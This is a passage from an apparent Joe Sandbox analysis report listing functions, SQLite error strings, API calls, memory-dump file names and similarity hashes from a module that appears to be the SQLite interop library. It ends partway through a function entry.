SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0000FB1B,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,?,?,6BC5AD52,?,?,?,?,?,?,?), ref: 6BC55A2A

Strings

%s at line %d of [%.10s], xrefs: 6BC55A23
database corruption, xrefs: 6BC55A1E
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC55A14

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d._memset
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 3064812586-2469029621
Opcode ID: 848e5f85764b6248f9aa9a2ab0326abb06c988a074edbbf82b38ee5625ec4418
Instruction ID: e865b2924ba537f5e1212d2e0e95d4c5cfb1fc786f33b6718539f662c81b15fc
Opcode Fuzzy Hash: 848e5f85764b6248f9aa9a2ab0326abb06c988a074edbbf82b38ee5625ec4418
Instruction Fuzzy Hash: 8221F677B1021667D7009EACDC81AFE7379EB94314F040179DA54AB345FB39AA2287A1

Function 6BCDE990 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SIdb45e174afb28e2c.SQLITE.INTEROP(SELECT * FROM "%w"."%w" WHERE NOT EXISTS ( SELECT 1 FROM "%w"."%w" WHERE %s),00000000,?,?,?,00000000,?,?,00000000,?,6BCE219E,00000012,?,?,?,?), ref: 6BCDE9A9
SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCDE9EE
SIa364946505687432.SQLITE.INTEROP(?,?,?), ref: 6BCDEA10
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCDEA29

Strings

SELECT * FROM "%w"."%w" WHERE NOT EXISTS ( SELECT 1 FROM "%w"."%w" WHERE %s), xrefs: 6BCDE9A4

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Ia364946505687432.$Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
String ID: SELECT * FROM "%w"."%w" WHERE NOT EXISTS ( SELECT 1 FROM "%w"."%w" WHERE %s)
API String ID: 1407660740-1508026296
Opcode ID: 2a1399356c48950d3dabfcf62d12f810c13c342f516b20762f94c79edacf5eec
Instruction ID: 6b55875d42f5dc58740ac583514e4b867bcb846631744a379c6b474d74821e7c
Opcode Fuzzy Hash: 2a1399356c48950d3dabfcf62d12f810c13c342f516b20762f94c79edacf5eec
Instruction Fuzzy Hash: BC1186F5A211156BDB00DB98AC81FABB3ACDB05268F1441A1FD08DB241F779EE1087E2

Function 6BC56F90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B645,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC56FB1

Strings

%s at line %d of [%.10s], xrefs: 6BC56FAA
SQLITE_, xrefs: 6BC56FC0
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC56F9B
misuse, xrefs: 6BC56FA5

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$SQLITE_$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-947822902
Opcode ID: 9f877be84508fc3ca7fb4d739720b6644475463ce0a7386831783f237ae7fe85
Instruction ID: a3bbe6c949c7380efa851dbf039e9264994800a77725a4aaf0353a182cfaf445
Opcode Fuzzy Hash: 9f877be84508fc3ca7fb4d739720b6644475463ce0a7386831783f237ae7fe85
Instruction Fuzzy Hash: 731136B3E2922427D7105AA9AC44B877BA88F407B8F0401B2FD48DB242F25DDA6582E4

Function 6BC566A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 58COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000079EB,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000001,00000000), ref: 6BC56714

Strings

%s at line %d of [%.10s], xrefs: 6BC5670D
2, xrefs: 6BC566D7
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC566FE
misuse, xrefs: 6BC56708

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$2$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-554099259
Opcode ID: 866eb643581784d51243fbbbd546e6a3e9d82e50db1e09ac9078d38a711a4836
Instruction ID: b432887085a20ec7b603aa37561a8d552294129d103586f682534a842838a6b1
Opcode Fuzzy Hash: 866eb643581784d51243fbbbd546e6a3e9d82e50db1e09ac9078d38a711a4836
Instruction Fuzzy Hash: 7911607151C3449FC300DF68C88285BBBE8BB89758F044A6DE5D99B241EB38D7188B97

Function 6BC5C9E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5CA0B
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5CA56

Strings

%s at line %d of [%.10s], xrefs: 6BC5CA04, 6BC5CA4F
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5C9F5, 6BC5CA40
misuse, xrefs: 6BC5C9FF, 6BC5CA4A

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 9bfdd368023edef4c2e965d2ef78a5195c49b3cb384a14f174150620647ce1c1
Instruction ID: 1122986e6d7847bca06ed1dc538134d426d03c5c1d2b8f037680ce353107bd47
Opcode Fuzzy Hash: 9bfdd368023edef4c2e965d2ef78a5195c49b3cb384a14f174150620647ce1c1
Instruction Fuzzy Hash: 4401C473B2161567D6009B699D06D07BB54EF81A78B044065EA19FF301FB28EA3146EA

Function 6BC5C940 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5C96B
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5C9B6

Strings

%s at line %d of [%.10s], xrefs: 6BC5C964, 6BC5C9AF
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5C955, 6BC5C9A0
misuse, xrefs: 6BC5C95F, 6BC5C9AA

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: bf4bff25611108d1a15db15a4ed94c0fd50ee9ef627e0326b6beafa74ad7b8b7
Instruction ID: ac6d9ab81ec1a8bcceb7ee39dde455a84bf0bb8d0a8e454f35af69eb6e08a1d0
Opcode Fuzzy Hash: bf4bff25611108d1a15db15a4ed94c0fd50ee9ef627e0326b6beafa74ad7b8b7
Instruction Fuzzy Hash: 0601D673B516116797005F799D06907B764EF41B787040065FA29FF301FB28EA3146EA

Function 6BC565F0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000079EB,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000), ref: 6BC56661

Strings

%s at line %d of [%.10s], xrefs: 6BC5665A
2, xrefs: 6BC56624
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5664B
misuse, xrefs: 6BC56655

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$2$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-554099259
Opcode ID: d91c8a2f29c14d3975fc20f8dc8f45a543874b708a56e88fc79fb79fea6c6607
Instruction ID: 17066471c26035d797cd2fe869800717bdd120ff57f827561b95d6e13a90a85e
Opcode Fuzzy Hash: d91c8a2f29c14d3975fc20f8dc8f45a543874b708a56e88fc79fb79fea6c6607
Instruction Fuzzy Hash: 741130715183449FC700DF68C89285BBBE4BB89718F444A6DE4999B241EB38D718CB97

Function 6BCED010 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000247EF,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,?,6BCED4B1,00000000), ref: 6BCED08C

Strings

fts5vocab, xrefs: 6BCED03C
%s at line %d of [%.10s], xrefs: 6BCED085
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCED076
misuse, xrefs: 6BCED080

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$fts5vocab$misuse
API String ID: 2981141233-3992595464
Opcode ID: e65f94bec5331d6b75eb1ee10d4200fed7543656592350bcea58fff79093ce9c
Instruction ID: 8ab27d0664584fc7a003f78f33934ce141f88ce3c10da14869d64e326ac6938e
Opcode Fuzzy Hash: e65f94bec5331d6b75eb1ee10d4200fed7543656592350bcea58fff79093ce9c
Instruction Fuzzy Hash: 7601DBB1B5161467EA106679AC06F473B589FC1669F040074FA0DEF241FA2CF71643B5

Function 6BC4C940 Relevance: 7.7, APIs: 5, Instructions: 181COMMON

Download Yara Rule

APIs

SI25d73a5ab4d6cacb.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC4C95D
SI558bdfe0e27562ea.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC4C9AF
SI25ca8d2baaee0750.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?), ref: 6BC4CA32
SI30455e90830ca460.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC4CA61
SI8259474343588db4.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC4CA70

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I25ca8d2baaee0750.I25d73a5ab4d6cacb.I30455e90830ca460.I558bdfe0e27562ea.I8259474343588db4.
String ID:
API String ID: 1749639562-0
Opcode ID: fb57f826a62f55f2a3544dbccb90273273129eab29cde45fd7409279caa571f6
Instruction ID: be5f2dc662a4701a219e6d3b52715c2c7bc3513adeb7539b6c5f661b488a8db0
Opcode Fuzzy Hash: fb57f826a62f55f2a3544dbccb90273273129eab29cde45fd7409279caa571f6
Instruction Fuzzy Hash: 9E516DB5A19201AFD710DE25CC81B6BBBB8FB85354F048559F85883310F739EB58CBA2

Function 6BC49C00 Relevance: 7.7, APIs: 5, Instructions: 153COMMON

Download Yara Rule

APIs

SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BC49D3B
SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BC49D7C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I8b0d9e6837e61abc.
String ID:
API String ID: 3274833830-0
Opcode ID: 205568aeb01f09b1378ff3c83c23812c2a764450f0524cc95d41f02400b08718
Instruction ID: 870bb40f05a279b93e528a3826d51d7f5aa4460b3fedca91b05dea19ad690c7c
Opcode Fuzzy Hash: 205568aeb01f09b1378ff3c83c23812c2a764450f0524cc95d41f02400b08718
Instruction Fuzzy Hash: C341E0B1A246219FE7048F65DA81B26B3B8BF45708F0441A9D8558B243F7BCEB51CBE1

Function 6BC3B540 Relevance: 7.6, APIs: 5, Instructions: 115COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC3B597
SIb50fc3839c421869.SQLITE.INTEROP(?,?,?,?,?,?,?), ref: 6BC3B5B6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC3B61A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC3B633
SIb50fc3839c421869.SQLITE.INTEROP(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6BC3B648

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Ib50fc3839c421869.
String ID:
API String ID: 1529703188-0
Opcode ID: f744999bb2c0d4923195223302d284b191c98e6ac0a2b0ddd576c3c6612d94bb
Instruction ID: eb48fca6f0ce16c9521793ac183ccc111f0cf894265655aaeb8e12fd4fb9598b
Opcode Fuzzy Hash: f744999bb2c0d4923195223302d284b191c98e6ac0a2b0ddd576c3c6612d94bb
Instruction Fuzzy Hash: D5316FB6614A006FD314DE68D881E6BB3FDFBC8714F448A1DF999C7201E738EA0487A1

Function 6BC6F7C0 Relevance: 7.6, APIs: 5, Instructions: 100COMMON

Download Yara Rule

APIs

SIdac3904ec873f97d.SQLITE.INTEROP(?,?,?), ref: 6BC6F812
SIe1639e708407f10b.SQLITE.INTEROP(?), ref: 6BC6F831
SIdac3904ec873f97d.SQLITE.INTEROP(?,?,?), ref: 6BC6F84C
SIe1639e708407f10b.SQLITE.INTEROP(?), ref: 6BC6F86B
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC6F89D

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Idac3904ec873f97d.Ie1639e708407f10b.$Iaa0f8e0c251cfd1d.
String ID:
API String ID: 78947605-0
Opcode ID: dd7939f2676a4527ffe76a8ca9c6459fd1703c64773a9616fb93c311fd4fda85
Instruction ID: 39bd62518998cd5f00ff7cf5d3b65bce415ff5403e2e5a9c974d9b31b6fc594f
Opcode Fuzzy Hash: dd7939f2676a4527ffe76a8ca9c6459fd1703c64773a9616fb93c311fd4fda85
Instruction Fuzzy Hash: BB21D0B69257016FD311CF749CC2E5B73A99F892A8B040568FD199B301FB79EA0583B2

Function 6BC47D30 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SI94ecb64e9dbb8338.SQLITE.INTEROP ref: 6BC47D6F
SIffb8076c269e2a85.SQLITE.INTEROP(?,?,?), ref: 6BC47DA7
SI8b0d9e6837e61abc.SQLITE.INTEROP(?,?), ref: 6BC47DB8
SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC47DE0
SIb50fc3839c421869.SQLITE.INTEROP(?,00000000), ref: 6BC47E17

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I8b0d9e6837e61abc.$I94ecb64e9dbb8338.Ib50fc3839c421869.Iffb8076c269e2a85.
String ID:
API String ID: 4133859212-0
Opcode ID: ac3c5215f4208f6104a98d6abd110732d9ab069455603b2c679aef555e318317
Instruction ID: 25ee8a2984ffb708b6c958ae7097aacb69ea96750c592b3d700a15c30326f52d
Opcode Fuzzy Hash: ac3c5215f4208f6104a98d6abd110732d9ab069455603b2c679aef555e318317
Instruction Fuzzy Hash: 942125B5915202AFC210EF74994396BB3A8EEC4604F004E6AE94187201FB3CDF2596E3

Function 6BBDC542 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6BBDC550

Part of subcall function 6BBDC4AE: __FF_MSGBANNER.LIBCMT ref: 6BBDC4C7
Part of subcall function 6BBDC4AE: __NMSG_WRITE.LIBCMT ref: 6BBDC4CE
Part of subcall function 6BBDC4AE: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6BBD610E,00000000,00000001,00000000,?,6BBDC12D,00000018,6BD115D0,0000000C,6BBDC1BD), ref: 6BBDC4F3

_free.LIBCMT ref: 6BBDC563

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 63e6ccc812382ec76531da87446c519778e8c8be87cf924524206c6b9f4f49ef
Instruction ID: d64a1e4d52ce9749f3b6512a74eae744095ba9ec41565ea3313de9507330f30b
Opcode Fuzzy Hash: 63e6ccc812382ec76531da87446c519778e8c8be87cf924524206c6b9f4f49ef
Instruction Fuzzy Hash: FD11C6328442D1EFDF111B78D806B4E3BA9FF927B9F21456AF8599A140DF3CCA418B94

Function 6BC11350 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

